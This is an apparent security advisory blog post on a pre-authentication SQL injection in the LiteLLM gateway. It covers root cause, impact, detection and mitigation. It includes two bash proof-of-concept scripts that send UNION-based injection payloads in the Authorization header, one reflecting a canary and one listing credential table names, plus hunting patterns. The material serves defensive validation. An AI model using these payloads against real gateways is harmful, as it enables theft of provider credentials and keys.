
CVE-2026-42208 and the LiteLLM Authorization Header SQL Injection

  • Writer: ninp0
  • 11 minutes ago
  • 6 min read

ABSTRACT

CVE-2026-42208 is a critical pre-authentication SQL injection in LiteLLM, the popular open-source LLM gateway used to broker access to providers such as OpenAI, Anthropic, and Amazon Bedrock. The defect sits in proxy API key verification, where the Authorization: Bearer value was mixed into SQL text instead of being passed as a parameter. That mistake gives unauthenticated attackers a path to arbitrary SELECT operations against the LiteLLM backend database.


The business significance is unusually high because AI gateways centralize the exact secrets attackers want most: provider credentials, virtual API keys, master keys, environment configuration, and model-routing policy. Public reporting shows exploitation attempts started roughly 36 hours after the advisory reached the GitHub Advisory Database, with operators going directly after LiteLLM tables tied to keys and configuration. In other words, this is not just another SQL injection story. It is a direct path from internet reachability to AI infrastructure secrets.


EXECUTIVE SUMMARY

GitHub rates CVE-2026-42208 as Critical with a CVSS v4 score of 9.3. Affected versions are LiteLLM 1.81.16 through 1.83.6, with the fix shipping in 1.83.7 and later. The official workaround, when immediate patching is impossible, is to set disable_error_logs: true under general_settings to remove the vulnerable error-handling path.


What makes the flaw operationally urgent is the blend of pre-auth reachability and secret concentration. LiteLLM commonly stores virtual tenant keys, upstream provider credentials, database connection material, callback destinations, and policy configuration in the same control plane. Public threat reporting from Sysdig describes attackers enumerating LiteLLM-specific schema details, targeting the verification-token table, credentials table, and configuration records that can reveal environment variables. Even a short exposure window can be enough for lasting downstream compromise if those secrets are reused elsewhere.


AFFECTED CONDITIONS

  • LiteLLM versions greater than or equal to 1.81.16 and lower than 1.83.7 are affected according to the GitHub security advisory.

  • The vulnerable path is reachable through LLM API routes such as POST /chat/completions, because proxy key verification executes before the request is forwarded upstream.

  • The attacker does not need valid LiteLLM credentials. The vulnerable input is the caller-controlled Authorization: Bearer value.

  • Internet-facing LiteLLM proxies are the highest-risk deployments, especially where the gateway stores real provider credentials or centrally brokers traffic for multiple internal teams.
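Given the advisory's range, checking whether a deployed build falls inside it can be scripted for triage. The sketch below is a lab helper, not part of LiteLLM; it assumes GNU coreutils `sort -V` is available for version ordering.

```shell
#!/usr/bin/env bash
# Lab triage helper (assumption: GNU coreutils `sort -V` for version ordering).
# Succeeds when a version string falls in the advisory range [1.81.16, 1.83.7).
litellm_affected() {
  local ver="$1" lo="1.81.16" hi="1.83.7"
  # ver >= lo: the smallest of (lo, ver) must be lo
  [ "$(printf '%s\n' "$lo" "$ver" | sort -V | head -n1)" = "$lo" ] || return 1
  # ver < hi: ver must not equal hi and must sort before it
  [ "$ver" != "$hi" ] || return 1
  [ "$(printf '%s\n' "$ver" "$hi" | sort -V | head -n1)" = "$ver" ]
}

litellm_affected "1.82.0"  && echo "1.82.0 is in the affected range"
litellm_affected "1.83.7"  || echo "1.83.7 is patched"
litellm_affected "1.81.15" || echo "1.81.15 predates the affected range"
```

Feed it the version reported by your deployment (for example from the proxy's health or version endpoint) rather than trusting package metadata alone.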


ROOT CAUSE AND ATTACK PATH

LiteLLM performs proxy API key verification against its backend database. In affected builds, a database query used the caller-supplied bearer token by interpolating it into SQL text rather than binding it as a parameter. That turns a normal authentication check into a SQL injection surface. Because the request reaches this logic before a valid key is required, the issue is pre-authentication by design rather than a post-auth escalation bug.
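To see why interpolation alone is the whole story, the pattern can be reproduced in miniature against a throwaway SQLite database. This is a stand-in, not LiteLLM's actual query, schema, or database engine; the `keys` table and token values are invented purely for illustration.

```shell
#!/usr/bin/env bash
# Miniature reproduction of the root-cause pattern (NOT LiteLLM code):
# the "keys" table and token values here are invented for illustration.
db="$(mktemp)"
sqlite3 "$db" "CREATE TABLE keys(token TEXT, owner TEXT);
               INSERT INTO keys VALUES('sk-real','alice');"

# Caller-controlled "bearer token", exactly as an attacker would supply it.
token="sk-litellm' UNION SELECT 'INJECTED'-- "

# Vulnerable pattern: the token is spliced into the SQL text, so the quote,
# the UNION, and the trailing comment all become part of the statement.
leaked="$(sqlite3 "$db" "SELECT owner FROM keys WHERE token = '$token'")"
echo "query returned: $leaked"

# The fix is parameter binding, so caller input is only ever treated as data.
rm -f "$db"
```

No row matches the fake token, yet the query still returns the attacker-chosen string, which is exactly the read primitive described above.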


Public reporting indicates the most straightforward exploitation path is UNION-based injection delivered via the Authorization header. The response path then leaks attacker-selected query output back through the application. Sysdig observed payloads targeted at LiteLLM_VerificationToken, litellm_credentials, and litellm_config, which is consistent with an operator who already understood LiteLLM's schema and went straight after the highest-value records.


The attack path matters because LiteLLM is not a passive application. It often has standing authority to call expensive or sensitive upstream AI services on behalf of many users and applications. A read primitive against the gateway database can therefore become a pivot into model-provider billing abuse, data exposure, shadow model invocation, webhook compromise, or later movement into other internal services referenced by environment variables and callbacks.


BUSINESS IMPACT

  • Provider credential theft: attackers can potentially extract OpenAI, Anthropic, Bedrock, or other upstream API credentials stored by the gateway.

  • Tenant impersonation: virtual API keys from LiteLLM can allow attackers to masquerade as internal applications or customers.

  • Operational blind spots: policy, budget, and logging settings held by the gateway can be studied or altered to hide abuse and increase spend.

  • Broader secret spillover: environment-variable configuration often contains database DSNs, master keys, callback endpoints, and cache or queue credentials that extend the blast radius beyond LiteLLM itself.


PUBLIC POC AND VALIDATION REFERENCES

There was no broadly circulated turnkey GitHub exploit repository visible at draft time, but there is already enough public material for defenders to validate the issue and understand how real operators are probing it. The GitHub security advisory and Sysdig's threat reporting are the most useful starting points.

The absence of a mass-exploit repo should not be mistaken for safety. The public payload examples and schema-aware targeting published by Sysdig are already more than enough for a capable adversary to reproduce the bug against exposed LiteLLM instances.


ORIGINAL 0DAY INC LAB-ONLY POC A: CONTROLLED CANARY INJECTION

The first 0day Inc PoC is intentionally conservative. It attempts to reflect a harmless literal value, 0DAY_CANARY, through the vulnerable query path on a LiteLLM instance you own or are explicitly authorized to test. This demonstrates arbitrary UNION output without touching real keys, credentials, or application data.

#!/usr/bin/env bash
set -euo pipefail

BASE_URL="${1:?usage: $0 https://litellm.lab}"
OUT="${OUT:-litellm-canary-response.txt}"
HDRS="${HDRS:-litellm-canary-headers.txt}"
PAYLOAD=${PAYLOAD:-"sk-litellm' UNION SELECT '0DAY_CANARY',NULL,NULL,NULL,NULL-- "}

curl -skS -D "$HDRS" -o "$OUT" \
  -X POST "${BASE_URL%/}/chat/completions" \
  -H "Authorization: Bearer ${PAYLOAD}" \
  -H "Content-Type: application/json" \
  --data '{"model":"gpt-4o-mini","messages":[{"role":"user","content":"ping"}]}' || true

echo "[*] response headers -> $HDRS"
echo "[*] response body    -> $OUT"
grep -n "0DAY_CANARY" "$OUT" && echo "[HIT] Canary value returned in application output" || echo "[INFO] Canary not reflected; inspect body and server logs in your lab"

Interpretation: if the canary value appears in the response body or associated server-side output in your lab, you have confirmed the injection path. At that point there is no need to escalate to credential extraction in order to prove risk.


ORIGINAL 0DAY INC LAB-ONLY POC B: METADATA-ONLY SCHEMA VALIDATION

The second 0day Inc PoC checks whether a vulnerable LiteLLM instance can be coerced into disclosing the names of high-value tables from information_schema. This is a safer way to confirm that the attack path can reach LiteLLM-specific data structures without retrieving actual credential material.

#!/usr/bin/env bash
set -euo pipefail

BASE_URL="${1:?usage: $0 https://litellm.lab}"
OUT="${OUT:-litellm-schema-check.txt}"
HDRS="${HDRS:-litellm-schema-headers.txt}"
PAYLOAD=${PAYLOAD:-"sk-litellm' UNION SELECT string_agg(table_name, ','),NULL,NULL,NULL,NULL FROM information_schema.tables WHERE lower(table_name) IN ('litellm_verificationtoken','litellm_credentials','litellm_config')-- "}

curl -skS -D "$HDRS" -o "$OUT" \
  -X POST "${BASE_URL%/}/chat/completions" \
  -H "Authorization: Bearer ${PAYLOAD}" \
  -H "Content-Type: application/json" \
  --data '{"model":"gpt-4o-mini","messages":[{"role":"user","content":"ping"}]}' || true

echo "[*] response headers -> $HDRS"
echo "[*] response body    -> $OUT"
grep -Eo "LiteLLM_VerificationToken|litellm_credentials|litellm_config" "$OUT" | sort -u || echo "[INFO] Table names not reflected; review body/logs in your lab"

Interpretation: if table names such as LiteLLM_VerificationToken, litellm_credentials, or litellm_config are returned or echoed into logs, defenders have enough evidence to treat the gateway as exposed and move immediately to patching and secret rotation.


DETECTION AND HUNTING

  • Search reverse-proxy and application logs for Authorization headers containing single quotes, UNION SELECT, or strings resembling sk-litellm'.

  • Hunt for requests to /chat/completions, /key/info, and /key/generate from unexpected sources, especially where the user agent resembles Python/3.12 aiohttp/3.9.1 as described by Sysdig.

  • Review database logs for unusual UNION queries or references to LiteLLM_VerificationToken, litellm_credentials, and litellm_config outside normal application behavior.

  • Monitor upstream AI-provider billing and usage for sudden spikes, new source IPs, or model calls that do not align with known application patterns.

  • If an internet-facing LiteLLM instance ran in the affected range, investigate whether environment-variable configuration, webhooks, or callback secrets need to be treated as exposed.
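A first-pass hunt for the markers above can be as simple as a pattern match over whatever log stream records request headers. The sample log lines and field names below are invented for the example; point the grep at whichever file in your stack actually captures Authorization material.

```shell
#!/usr/bin/env bash
# Sketch: first-pass hunt for CVE-2026-42208 probe markers.
# The sample log lines and format are invented; adapt the pattern and the
# log path to whatever stream records request headers in your environment.
log="$(mktemp)"
cat > "$log" <<'EOF'
10.0.0.5 POST /chat/completions authz="Bearer sk-litellm' UNION SELECT ..." ua="Python/3.12 aiohttp/3.9.1"
10.0.0.9 POST /chat/completions authz="Bearer sk-abc123" ua="my-app/1.0"
EOF

# Count lines carrying any of the schema-aware markers from public reporting.
hits="$(grep -Eic "union[[:space:]]+select|sk-litellm'|information_schema|litellm_verificationtoken" "$log")"
echo "suspicious request lines: $hits"
rm -f "$log"
```

Any nonzero count against real logs is worth triaging as a probe, even if the response codes look benign.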


MITIGATION PRIORITIES

  • Upgrade LiteLLM immediately to version 1.83.7 or later.

  • If emergency patching is delayed, set disable_error_logs: true under general_settings as the vendor-published workaround and reduce internet exposure at the same time.

  • Rotate virtual API keys, master keys, upstream provider credentials, and any secrets referenced by litellm_config or environment variables if the instance was reachable while vulnerable.

  • Place LiteLLM behind trusted internal networks or authenticated reverse proxies; an internet-facing AI gateway should be treated as a privileged asset, not a convenience endpoint.

  • Add detection around malformed Authorization headers and create billing or usage alerts for unexplained provider consumption after the exposure window.
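For reference, the vendor-published workaround is a one-line config change. The snippet below writes it to a temporary file to show the shape; in practice edit the config your proxy is launched with, and if a `general_settings` block already exists, merge the key into it rather than appending a duplicate block.

```shell
#!/usr/bin/env bash
# Shape of the vendor-published workaround (disable_error_logs under
# general_settings). Written to a temp file here for illustration; apply it
# to the config file your `litellm --config` invocation actually points at.
cfg="$(mktemp)"

cat >> "$cfg" <<'EOF'
general_settings:
  disable_error_logs: true
EOF

# Confirm the setting landed where expected.
grep -n "disable_error_logs" "$cfg"
```

Remember this is a stopgap that removes the vulnerable error-handling path; it does not substitute for upgrading to 1.83.7 or later.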


BOTTOM LINE

CVE-2026-42208 is the kind of bug defenders should assume will be operationalized quickly because it sits on the front door of a secret-dense AI control plane. If your LiteLLM proxy was exposed in the affected range, the right response is not just patching. It is patching, containment, credential rotation, and verification that your model-provider trust chain was not quietly inherited by someone else.

0day Inc.

"world-class security solutions for a brighter tomorrow"
